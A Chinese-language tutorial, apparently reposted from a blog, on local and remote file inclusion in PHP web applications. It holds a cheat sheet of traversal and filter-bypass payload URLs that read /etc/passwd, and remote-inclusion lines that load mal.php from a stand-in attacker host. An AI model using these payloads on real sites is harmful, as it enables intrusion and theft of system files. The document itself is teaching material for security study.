首页 > 其他分享> > 4.6 File Inclusion

4.6 File Inclusion

2021-04-14 23:05:44 作者：互联网

简介

是什么

文件包含，一个简单的例子，和 c 语言 include 一样，将一个文件包含到另一个文件。通常出现在多文件开发，模块化开发的场景下。

文件包含，就是代码中通过某种方法包含了其它文件，可以将另一个文件的内容引入到当前文件。从而可以执行代码。

# 本地文件包含
http://example.com/index.php?page=/etc/passwd

# 远程文件包含
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

根据包含文件的位置，文件包含分为 LFI / RFI 本地文件包含/远程文件包含。

实际中的限制

虽然能包含文件，通常只能包含某个固定范围的文件。

即使能随便包含，通常也找不到存在恶意代码的文件。

远程包含一般是默认禁用，或者代码不支持。

攻击

探测参数入口点。一般而言，参数名、值都比较明显，page= 或 file= 等等。这块可以根据经验进行判断。
绕过代码过滤。常见的绕过方式，见下文。

以下字典包含了常见的绕过 payload ： windows linux
利用。最终执行代码。

代码防御绕过

绕过原理

某些是利用系统、编程语言、中间件的特性。例如在某些场景下：

 /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.

常见的绕过方式分为以下几种：

代码过滤不严谨：

# 非递归过滤
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

# 若代码是检测前缀
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

# 若是黑名单过滤后缀
shellcode.php/.
passwd/

# 后缀白名单，利用截断
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

# 路径长度截断
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

编码、特殊字符：

# 若代码在尾部添加文件后缀，可以尝试 00 截断
http://example.com/index.php?page=../../../etc/passwd%00


# 或许可以尝试二次 url 编码
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00


http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

若是远程包含，并且代码中固定了文件后缀，此时可以尝试将其化为 url 参数。
```
include($_GET['file'].'.png');
# 那么可以这样传参
?file=shell.php?x=1
?file=shell.php#x=1
```

利用

php url-wrappers

php 提供的协议封装流，可以将很多东西视为文件。可以扩大文件包含的利用面。关于 php 支持的 wapper 详情见官方手册

php 中有以下包含函数 require, require_once, include, include_once

php 中与之相关的参数有 allow_url_fopen allow_url_include 分别决定能否使用协议封装流，能否在包含函数处使用。

标签：index,4.6,http,..,Inclusion,File,php,com,page
来源： https://www.cnblogs.com/starrys/p/14660346.html